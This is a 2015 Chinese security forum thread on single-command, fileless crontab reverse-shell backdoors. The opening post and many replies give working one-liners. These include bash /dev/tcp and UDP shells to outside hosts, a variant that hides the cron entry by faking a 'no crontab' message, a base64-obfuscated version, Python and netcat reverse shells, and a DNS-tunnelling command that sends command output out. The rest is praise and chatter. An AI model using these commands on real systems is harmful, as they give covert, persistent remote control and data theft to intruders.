一条命令实现无文件兼容性强的反弹后门 (WOOY

发表评论
368 次浏览

A+

猪猪侠 (每次有人骂我是猪我都说自己是猪猪侠) | 2015-01-25 20:15

最好用一个不常见的用户执行，任务写入/var/spool/cron/$username

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -

升级猥琐版，crontab -l 直接提示no crontab for $username
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

60分钟反连一次，在未连接状态启动反连任务的时候，进程和端口都无状态

-bash: connect: Connection refused -bash: /dev/tcp/dns.wuyun.org/53: Connection refused -bash: 9: Bad file descriptor -bash: 9: Bad file descriptor
也就是说，你安装后，如果不连接成功，是很难被发现的。

分享到：

53 个回复

1#
感谢(2)

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

wzt (瘦古龙) | | 2015-01-26 13:11

bash udp反弹后门：
#!/bin/bash exec 9<> /dev/udp/localhost/8080 [ $? -eq 1 ] && exit echo "connect ok" >&9
while : do a=`dd bs=200 count=1 <&9 2>/dev/null` if echo "$a"|grep "exit"; then break; fi echo `$a` >&9 done
exec 9>&- exec 9<&-
https://github.com/cloudsec/brootkit/blob/master/ubd.sh
2#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

RAINMan | 2015-01-25 20:16

赞
3#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

TestRoot | 2015-01-25 20:16

好牛逼
4#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Coffee (暂别乌云，安心高考) | 2015-01-25 20:21

赞
5#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Well (男神提枪逛青楼。) | 2015-01-25 20:29

微博中中看到了，赞一个
6#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

李旭敏 (˿̖̗̀́̂̃̄̅̆̇̈̉̊̋̌̍̎̏̐̑̒̓̔̕) | 2015-01-25 21:20

目测连接成功后，也是很难被发现的。
7#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

刘海哥 (‮moc.ghuil.www) | 2015-01-25 21:35

这么说猪猪侠有很多后门咯
8#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

猪猪侠 (每次有人骂我是猪我都说自己是猪猪侠) | 2015-01-25 22:06

更加隐藏的版本
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wooyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
9#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

子非海绵宝宝 (呵呵) | 2015-01-25 22:10

好东西....
10#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

greg.wu | 2015-01-25 22:14

好牛啊
11#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

hkmm | 2015-01-25 22:22

屌屌屌
12#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Power | 2015-01-25 22:26

收藏..
13#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

泳少 (此号被射！by U神) | 2015-01-25 22:31

猪哥终于分享多年的经验了
14#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

redrain有节操 (快来和我滚床单) | 2015-01-25 22:52

@猪猪侠这个隐藏版本确实学到了，湾湾orange吊吊的
15#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

superbing (技术交流，乐在分享！) | 2015-01-25 23:01

/var/spool/cron/ 连个read 权限都没有
16#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

superbing (技术交流，乐在分享！) | 2015-01-25 23:03

crontab 也没权限。。。
17#
感谢(1)

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

null (生活不会像你想象得那么好，也不会像你想象得那么糟。) | 2015-01-25 23:17

@superbing @superbing 理想很丰满，现实很骨感。。。
18#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

wefgod (求大牛指点) | 2015-01-26 09:05

太恐怖了！
19#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

xsjswt | 2015-01-26 09:13

tty设置不对的话，第二条反而惹嫌疑
20#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

流星warden (尘归尘，土归土，让往生者安宁，让在世者重获解脱。) | 2015-01-26 09:23

想象是美好的，现实是残酷的。。
21#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

黑吃黑 (粪土当年万户侯) | 2015-01-26 09:25

@猪猪侠你在乌云那么叼，你领导知道吗？
22#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

0x12 (帽子掉了|多逛，少说话。|小学生　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　) | 2015-01-26 09:29

简单好用易懂
23#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Xeyes (无个性,不签名.) | 2015-01-26 09:45

收藏～～～～
24#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

_Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2015-01-26 10:03

赞！
25#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

wzt (瘦古龙) | 2015-01-26 11:22

exec 9<> /dev/tcp/localhost/8080&&exec 0<&9&&exec 1>&9 2>&1&&/bin/bash --noprofile -i

这样tcp连接不成功，就不会继续执行bash了, 不然每隔1小时系统里就会多出一个/bin/bash -i的进程。

另外还可以把反弹后门用base64加密，运行时解密：
*/1 * * * * a=`echo "ZXhlYyA5PD4gL2Rldi90Y3AvbG9jYWxob3N0LzgwODA7ZXhlYyAwPCY5O2V4ZWMgMT4mOSAyPiYxOy9iaW4vYmFzaCAtLW5vcHJvZmlsZSAtaQ=="|base64 -d`;/bin/bash -c "$a";unset a

更多关于bash的渗透技巧请访问：https://github.com/cloudsec/brootkit
26#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

过客 | 2015-01-26 11:32

@wzt 赞
27#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

redrain有节操 (快来和我滚床单) | 2015-01-26 12:08

刚刚orange又教一招
printf "*/3 * * * * $CMD;\rno crontab for $USER%$((${#CMD}+10))c\n" | crontab -
28#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

keke (秒杀各种装逼犯) | 2015-01-26 13:20

@Well 求头像番号
29#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Fireweed | 2015-01-26 13:24

mark
30#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

RainShine (I'm your angel of music.) | 2015-01-26 13:29

mark.
31#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

猪猪侠 (每次有人骂我是猪我都说自己是猪猪侠) | 2015-01-26 13:50

@wzt 赏你一个乌云币。
32#
感谢(1)

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Well (男神提枪逛青楼。) | 2015-01-26 18:24

@keke 点感谢后，发你
33#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Zvall (safeKey team - 电击小子) | 2015-01-26 18:44

@wzt Nice Nice
34#
感谢(1)

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

冰锋刺客 (往日不可追) | 2015-01-26 19:00

这个还是比较有用的，先记下...
35#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

lnterface | 2015-01-26 23:16

先记录一下啊
36#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

keke (秒杀各种装逼犯) | 2015-01-27 13:34

@Well 点了啊快点发来
37#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Spy4man (多人使用的公共号，言论不代表ID本人!) | 2015-01-27 16:56

//python版本，kali下面测试成功,tcp 8080:
(crontab -l;printf "*/5 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.153\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);';\rno crontab for `whoami`%100c\n")|crontab -
38#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Spy4man (多人使用的公共号，言论不代表ID本人!) | 2015-01-27 16:57

//python版本，kali下面测试成功,tcp 8080: (crontab -l;printf "*/5 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.153\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);';\rno crontab for `whoami`%100c\n")|crontab -
39#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Spy4man (多人使用的公共号，言论不代表ID本人!) | 2015-01-27 17:00

自动转义真烦人，大家把上面代码的双斜线修改为单斜线！
40#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Spy4man (多人使用的公共号，言论不代表ID本人!) | 2015-01-27 17:07

//nc版本，tcp 8080 kali下面测试成功: (crontab -l;printf "*/5 * * * * /bin/nc 192.168.1.153 8080 -e /bin/sh;\rno crontab for `whoami`%100c\n")|crontab -
41#
感谢(3)

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Feei | 2015-01-27 22:12

@wzt 端口根据目标机器定会更好
42#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

zhxs (宁愿做一天的英雄,也不愿意平淡一生！) | 2015-01-27 23:19

虽然我不知道你们在说什么但是我知道你们一定说的很牛逼
43#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

小呆呆 (每次有人骂我猪我就说我偶像也是猪) | 2015-01-28 14:56

百度有新闻么：）
44#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

紫霞仙子 | 2015-01-28 15:14

(ส็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็ส้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้ส็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็ส้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้)
45#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

_Evil (科普是一种公益行为) | 2015-01-29 12:52

net user | nslookup type=A 144.144.144.144
net user > \\ip\c$\xxx.txt

http://www.freebuf.com/articles/system/57183.html

http://paper.aliapp.com/md/dns.txt

LINE=`id`; domain="yourdomain.com";while read -r -n 1 char; do var+=$(printf "%X" \'$char\');done<<<$LINE;b=0;e=60;l=${#var}; while [ $b -lt $l ];do >& /dev/udp/$RANDOM.$b."${var:$b:$e}". $domain/53 0>&1;let b=b+60;done;>& /dev/udp/$RANDOM.theend.$domain/53 0>&1;unset var;unset var2
46#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

_Evil (科普是一种公益行为) | 2015-01-29 12:54

@猪猪侠猪哥来一发Linux下端口复用和 Win下ndis复用的科普文章。
47#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

_Evil (科普是一种公益行为) | 2015-01-29 12:59

作为一个Wooyun党,里面其实还有两个白帽子也发来类似的

http://zone.wooyun.org/content/11338

http://zone.wooyun.org/content/6041

现在的内网dns都出不来只能靠复用了

@猪猪侠猪哥来一发Linux下端口复用和 Win下ndis复用的科普文章。
48#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

顺子 | 2015-01-29 13:17

你们够了。。
49#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

keke (秒杀各种装逼犯) | 2015-01-29 13:31

(ส็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็ส้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้ส็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็ส้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้)
50#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Well (男神提枪逛青楼。) | 2015-01-31 08:41

@顺子短消息已经发你了
51#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

Well (男神提枪逛青楼。) | 2015-01-31 08:41

@keke 短消息发你了
52#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

ice (%2F) | 2015-02-02 00:07

mark
53#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

exploits (As We Do , As You Know !) | 2015-02-02 13:18

猪哥来一发Linux下端口复用和 Win下ndis复用的科普文章。
54#

回复此人
 感谢

"感谢"将向此回复作者赠送1个乌云币。

宁波理工的小白菜 (我是菜鸟求交流) | 2015-03-11 22:13

虽然听不懂你在说什么，我还是Mark一下吧